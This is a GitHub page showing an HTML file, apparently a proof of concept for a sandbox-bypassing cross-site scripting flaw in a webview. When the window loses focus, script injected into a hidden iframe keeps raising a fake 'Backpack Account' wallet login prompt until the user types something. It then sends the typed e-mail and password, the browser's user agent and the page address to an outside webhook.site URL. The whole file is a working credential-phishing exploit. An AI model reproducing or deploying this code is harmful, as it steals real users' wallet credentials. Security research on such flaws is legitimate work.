-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathback.html
More file actions
39 lines (38 loc) · 1.35 KB
/
back.html
File metadata and controls
39 lines (38 loc) · 1.35 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, user-scalable=no">
<title>Bypass Sandbox Webview UXSS Delayed JavaScript</title>
<style>
iframe { visibility: hidden; }
body { font-family: system-ui, sans-serif; text-align: center; padding-top: 100px; }
</style>
<script>
window.onblur = function () {
const code =
"(function(){try{"
+ "var msg='In order to access your Wallet\\n"
+ "you must first login on your\\nBackpack Account.\\n\\n"
+ "Please type your e-mail\\nand your password:';"
+ "var v='';"
+ "while(v===null||(''+v).trim()===''){"
+ " v=prompt(msg,'E-mail / Password.');"
+ "}"
+ "var u='https://webhook.site/2c1d7ce8-a03c-4f27-9b1c-8919a32bd492/'"
+ " + '?creds=' + encodeURIComponent(v)"
+ " + '&ua=' + encodeURIComponent(navigator.userAgent)"
+ " + '&page=' + encodeURIComponent(location.href);"
+ "try{ if(!navigator.sendBeacon(u)){ throw new Error('beacon-fallback'); } }catch(e){"
+ " try{ (new Image()).src = u; }catch(_e){}"
+ "}"
+ "}catch(e){}})()";
document.getElementById('iframe').src = "javascript:" + code;
};
</script>
</head>
<body>
<h1>Click Here</h1>
<iframe id="iframe"></iframe>
</body>
</html>